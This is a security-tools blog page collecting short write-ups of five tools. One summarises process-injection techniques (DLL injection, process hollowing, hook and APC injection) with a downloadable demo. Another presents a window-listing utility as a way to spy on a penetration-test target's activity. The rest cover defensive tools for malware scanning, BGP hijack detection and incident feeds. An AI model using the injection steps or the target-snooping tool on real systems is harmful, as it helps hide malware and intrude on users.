This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Processes. Show all posts
Showing posts with label Processes. Show all posts

InjectProc - Process Injection Techniques


Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.

There are several techniques, which are commonly used: DLL injection, process replacement (a.k.a process hollowing), hook injection and APC injection.

Most of them use same Windows API functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, for detailed information about those functions, use MSDN.

DLL injection:
  • Open target process.
  • Allocate space.
  • Write code into the remote process.
  • Execute the remote code.

Process replacement:
  • Create target process and suspend it.
  • Unmap from memory.
  • Allocate space.
  • Write headers and sections into the remote process.
  • Resume remote thread.

Hook injection:
  • Find/Create process.
  • Set hook

APC injection:
  • Open process.
  • Allocate space.
  • Write code into remote threads.
  • "Execute" threads using QueueUserAPC.

Download
Windows x64 binary - x64 bit DEMO

Dependencies:
vc_redist.x64 - Microsoft Visual C++ Redistributable

DEMO


Web Exploit Detector - Tool To Detect Possible Infections, Malicious Code And Suspicious Files In Web Hosting Environments


The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it.

As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed.
The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Installation

Regular users
The simplest way to install Web Exploit Detector is as a global NPM module: -
npm install -g web_exploit_detector
If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating
The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: -
npm update -g web_exploit_detector
Again, you may have to use the sudo command as above.

Technical users
You can also clone the Git repository and run the script directly like so: -
  1. git clone https://github.com/polaris64/web_exploit_detector
  2. cd web_exploit_detector
  3. npm install

Running

From NPM module
If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): -
wed-scanner --webroot=/var/www/html
Other command-line options are available, simply run wed-scanner --help to see a help message describing them.
Running the script in this way will produce human-readable output to the console. This is very useful when running the script with cron for example as the output can be sent as an e-mail whenever the script runs.
The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument.

From cloned Git repository
Simply call the script via node and pass the path to your webroot as follows: -
node index.js --webroot=/var/www/html

Recursive directory snapshots
The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots
A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the point in which the snapshot was created. If a snapshot was generated on Monday, for example, and then the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities therefore is to allow these snapshots to be created and for the comparisons to be performed when required.
The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents.

Usage
The following two utilities are also installed as part of Web Exploit Detector: -
  • wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option.
  • wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.

Workflow
Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly as new uploads will cause the new state to change from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely ensure nothing actually does change.

Usage as a module
The src/web-exploit-detector.js script is an ES6 module that exports the set of rules as rules as well as a number of functions: -
  • executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
  • formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test.
  • getFileList(path): returns an array of files from the base path using readDirRecursive().
  • processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
  • readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories.
The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used.
The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead.

Building
The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts.
The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule
Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included.
The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file.
For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option.
For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine
The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests.
Each individual test must be one of the following: -
  • A regular expression: the simplest type of test, any value matching the regex will pass the test.
  • A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations.
  • A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations.
The following test types are supported: -
  • "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
  • "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations.

Expanding on the rules
As web-based exploits are constantly evolving and new exploits are being created, the set of rules need to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
This brings me onto the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date.

Contributing rules
If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request.
Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it.
Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID.

Unit tests and linting
The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint.
When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used.
Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.


TaBi - Track BGP Hijacks


Developed since 2011 for the needs of the French Internet Resilience Observatory, TaBi is a framework that ease the detection of BGP IP prefixes conflicts, and their classification into BGP hijacking events. The term prefix hijacking refers to an event when an AS, called an hijacking AS, advertises illegitimately a prefix equal or more specific to a prefix delegated to another AS, called the hijacked AS.

Usually, TaBi processes BGP messages that are archived in MRT files. Then, in order to use it, you will then need to install a MRT parser. Its favorite companion is MaBo, but it is also compatible with CAIDA's bgpreader. Internally, TaBi translates BGP messages into its own representation. Therefore, its is possible to implement new inputs depending on your needs.

Authors
## Building TaBi
TaBi depends on two external Python modules. The easiest method to install them is to use virtualenv and pip.
If you use a Debian-like system you can install these dependencies using:
apt-get install python-dev python-pip python-virtualenv
Then install TaBi in a virtual environment:
virtualenv ve_tabi
source ve_tabi/bin/activate
pip install py-radix python-dateutil
python setup.py install
Removing TaBi and its dependencies is therefore as simple as removing the cloned repository.
## Usage
Historically TaBi was designed to process MRT dump files from the collectors of the RIPE RIS.
### Grabbing MRT dumps
You will then need to retrieve some MRT dumps. Copying and pasting the following commands in a terminal will grab a full BGP view and some updates.
wget -c http://data.ris.ripe.net/rrc01/2016.01/bview.20160101.0000.gz
wget -c http://data.ris.ripe.net/rrc01/2016.01/updates.20160101.0000.gz

tabi - the command line tool
The tabi command is the legacy tool that uses TaBi to build technical indicators for the Observatory reports. It uses mabo to parse MRT dumps.
Given the name of the BGP collector, an output directory and MRT dumps using the RIS naming convention, tabi will follow the evolution of routes seen in MRT dumps (or provided with the --ases option), and detect BGP IP prefixes conflicts.
Several options can be used to control tabi behavior:
$ tabi --help
Usage: tabi [options] collector_id output_directory filenames*

Options:
-h, --help show this help message and exit
-f, --file files content comes from mabo
-p PIPE, --pipe=PIPE Read the MRT filenames used as input from this pipe
-d, --disable disable checks of the filenames RIS format
-j JOBS, --jobs=JOBS Number of jobs that will process the files
-a ASES, --ases=ASES File containing the ASes to monitor
-s, --stats Enable code profiling
-m OUTPUT_MODE, --mode=OUTPUT_MODE
Select the output mode: legacy, combined or live
-v, --verbose Turn on verbose output
-l, --log Messages are written to a log file.
Among this options, two are very interesting:
  • -j that forks several tabi processes to process the MRT dumps faster
  • -a that can be used to limit the output to a limited list of ASes
Note that the legacy output mode will likely consume all file descriptors as it creates two files per processed AS (i.e. around 100k opened files). The default is the combined output mode.
Here is an example call to tabi:
tabi -j 8 rrc01 results/ bview.20160101.0000.gz updates.20160101.0000.gz
After around 5 minutes of processing, you will find the following files in results/2016.01/:
  • all.defaults.json.gz that contains all default routes seen by TaBi
  • all.routes.json.gz that contains all routes monitored
  • all.hijacks.json.gz that contains all BGP prefix conflicts
## Using TaBi as a Python module
TaBi could also be used as a regular Python module in order to use it in your own tool.
The example provided in this repository enhance BGP prefix conflicts detection, with possible hijacks classification. To do so, it relies on external data sources such as RPKI ROA, route objects and other IRR objects.


IntelMQ - A solution for IT security teams for collecting and processing security feeds using a message queuing protocol


IntelMQ is a solution for IT security teams (CERTs, CSIRTs, abuse departments,...) for collecting and processing security feeds (such as log files) using a message queuing protocol. It's a community driven initiative called IHAP (Incident Handling Automation Project) which was conceptually designed by European CERTs/CSIRTs during several InfoSec events. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.

IntelMQ's design was influenced by AbuseHelper , however it was re-written from scratch and aims at:
  • Reduce the complexity of system administration
  • Reduce the complexity of writing new bots for new data feeds
  • Reduce the probability of events lost in all process with persistence functionality (even system crash)
  • Use and improve the existing Data Harmonization Ontology
  • Use JSON format for all messages
  • Integration of the existing tools (AbuseHelper, CIF)
  • Provide easy way to store data into Log Collectors like ElasticSearch, Splunk, databases (such as PostgreSQL)
  • Provide easy way to create your own black-lists
  • Provide easy communication with other systems via HTTP RESTFUL API
It follows the following basic meta-guidelines:
  • Don't break simplicity - KISS
  • Keep it open source - forever
  • Strive for perfection while keeping a deadline
  • Reduce complexity/avoid feature bloat
  • Embrace unit testing
  • Code readability: test with unexperienced programmers
  • Communicate clearly


Table of Contents
  1. How to Install
  2. Developers Guide
  3. IntelMQ Manager
  4. Incident Handling Automation Project
  5. Data Harmonization
  6. How to Participate
  7. Licence


How to Install


Developers Guide


IntelMQ Manager
Check out this graphical tool and easily manage an IntelMQ system.


Incident Handling Automation Project


Data Harmonization
IntelMQ use the Data Harmonization. Check the following document .


How to participate

[ShowWindows v1.0] Command-line Tool to Manage Open Windows


Show Windows is the command-line tool to manage Windows opened by all running Processes on your system.

In addition to showing open Windows, it does little more. Here are some of the things that you can do with ShowWindows,
  • View all open Windows/Apps
  • Windows opened by particular User
  • Windows opened by particular Process
  • Search for Windows with specified Title
  • Close the Window
  • Kill the selected Process


In Penetration Testing environment, it can help you to discover all kind of activities happening on the target system. Instead of just plain listing of running processes, open Windows list can reveal more interesting details. For example, Files currently opened by the user, what songs/videos being played, what websites being watched etc.


'Show Windows' is available in both 32 bit & 64 bit versions. It works on all Windows Platforms starting from Windows XP to latest version, Windows 8.

Examples of ShowWindows
//Show all open windows
ShowWindows.exe

//List all open windows belonging to process id 1000
ShowWindows.exe -p 1000

//List all open windows belonging to user admin
ShowWindows.exe -u "admin"

//Close the Window with title 'Mozilla Firefox'
ShowWindows.exe -c "Mozilla Firefox"

//Kill the Process with PID 1000
ShowWindows.exe -k 1000

//List all open Windows having title Chrome
ShowWindows.exe -s "chrome"


Download ShowWindows 
License : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More info